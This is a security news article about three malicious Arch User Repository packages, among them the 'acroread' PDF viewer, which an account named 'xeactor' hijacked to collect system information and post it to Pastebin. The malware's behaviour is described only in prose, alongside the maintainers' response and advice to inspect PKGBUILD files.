Yet another incident that shows why you should never blindly trust packages from user-controlled software repositories.

Arch Linux, one of the most popular independently developed Linux distributions, has removed three packages from its community-driven Arch User Repository (AUR) after they were found to contain malicious code.

Arch Linux is a general-purpose GNU/Linux distribution focused on free and open-source software with strong community involvement. In addition to its official repositories, users often rely on the AUR for additional packages maintained by fellow users.

Because AUR packages are user-submitted, Arch maintainers have always advised users to carefully inspect the PKGBUILD and any .install files for suspicious commands before building and installing them.

Compromised PDF Viewer Found on Arch Linux AUR

On June 7, a malicious user nicknamed "xeactor" adopted an orphaned AUR package called acroread (a PDF viewer) and modified it to include malicious code.

According to a Git commit to the package, xeactor added code that downloads a curl script from a remote server. That script then installs and runs a persistent component every 360 seconds while interfering with systemd configuration.

The malicious script was designed to collect the following information from infected systems:

  • Date and time
  • Machine ID
  • Pacman package manager information
  • Output of the uname -a command
  • CPU information
  • Output of the systemctl list-units command

The collected data was posted to a Pastebin document.

Fortunately, the malicious modifications were discovered through code analysis before they could do serious damage. However, the attacker could have updated the payloads at any time to deliver more sophisticated malware.

Once the compromise was discovered, AUR maintainers quickly reverted the changes, suspended xeactor’s account, and identified two more packages that the same user had recently adopted and modified in the same way.

Additional Malicious Packages Removed

The AUR team removed the other two packages without publicly disclosing their names.

If you recently installed the "acroread" package, remove it from your system immediately.

While this particular incident did not pose a severe threat, it has once again highlighted the risks of relying on unvetted user-contributed packages.

In a comment on the Arch Linux mailing list, developer Giancarlo Razzolini wrote:

"I am surprised that this type of silly package takeover and malware introduction does not happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves."

"Helpers that do everything automatically and users that don't pay attention, will have issues. You should use helpers even more so at your risk than the AUR itself."

Bottom line: With any user-maintained repository, always review the PKGBUILD and build scripts yourself before installing anything.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.